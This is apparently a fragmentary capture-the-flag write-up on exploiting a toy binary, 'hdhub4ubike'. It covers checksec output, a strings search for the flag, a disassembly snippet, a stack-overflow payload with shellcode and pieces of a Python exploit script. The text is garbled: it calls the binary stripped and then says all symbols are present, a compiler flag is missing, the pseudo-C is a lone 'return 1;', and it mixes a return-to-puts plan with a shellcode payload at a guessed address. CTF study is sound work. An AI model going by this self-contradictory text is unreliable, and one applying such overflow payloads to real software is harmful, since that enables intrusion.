```
$ ./hdhub4ubike
=== Welcome to the HD Bike Hub ===
Enter your hub key:
```

Static analysis quickly reveals that the binary is stripped (no symbols) and that it is compiled with , -z execstack, and -no-pie – classic “easy pwn” settings.

```
$ checksec --file=hdhub4ubike
...
PIE: No
NX: No
RELRO: No
Canary: No
FORTIFY: No
```

The binary – we have all symbol names!

2.2 Strings

```
$ strings -a hdhub4ubike | grep -i flag
flagh0p3_y0u_f0und_th3_h1d3_b1k3
```

Whoa! The flag is already present in the binary! This is a typical “decoy” – the binary will only print the flag after a successful key check. The challenge is to bypass that check.

2.3 Disassembly (Ghidra/IDA)

Opening the binary in Ghidra shows the following (pseudo‑C) reconstruction of the relevant functions:

```c
return 1;
```

```
0x0040119f: lea rdi, [rip+0x2000] ; address of the flag string
0x004011a6: call puts@plt
```

0x004011a6 is the address of the call instruction itself. If we return to this address after the overflow, the program will execute the puts call with the correct argument already loaded (the lea instruction that loads the flag pointer into rdi is right before it). Therefore we want our overwritten return address to be 0x004011a6.

3.2 Crafting the payload

The stack layout (simplified) at the moment of the overflow:

```python
payload = b'A'*64 + b'B'*8 + struct.pack("<Q", 0x7fffffffe000)  # address of our buffer (approx)
payload = payload.ljust(0x100, b'\x90') + shellcode
```

Running the payload spawns an interactive shell on the remote target.

| Topic | What we observed in hdhub4ubike |
|---------------------------|-----------------------------------|
| Stack overflow | read with a length far larger than the buffer → classic overflow vector. |
| Non‑PIE binary | Fixed addresses make ROP or a simple return‑to‑code trivial. |
| NX disabled | Allows injection of raw shellcode on the stack. |
| No canary / RELRO | Nothing blocks overwriting the saved RIP. |
| Info leakage | The flag was embedded in the binary – a “cheat” that encourages bypassing logic checks. |
| Best exploitation path | Return to the existing puts call that already has the flag address set → shortest payload, no need for a ROP chain or shellcode. |

6️⃣ Full Exploit Script (Python 3)

```python
#!/usr/bin/env python3
import struct, pexpect, sys
```

```python
p.sendline(payload.decode('latin-1'))  # send as a line
p.interact()                            # hand over the terminal
```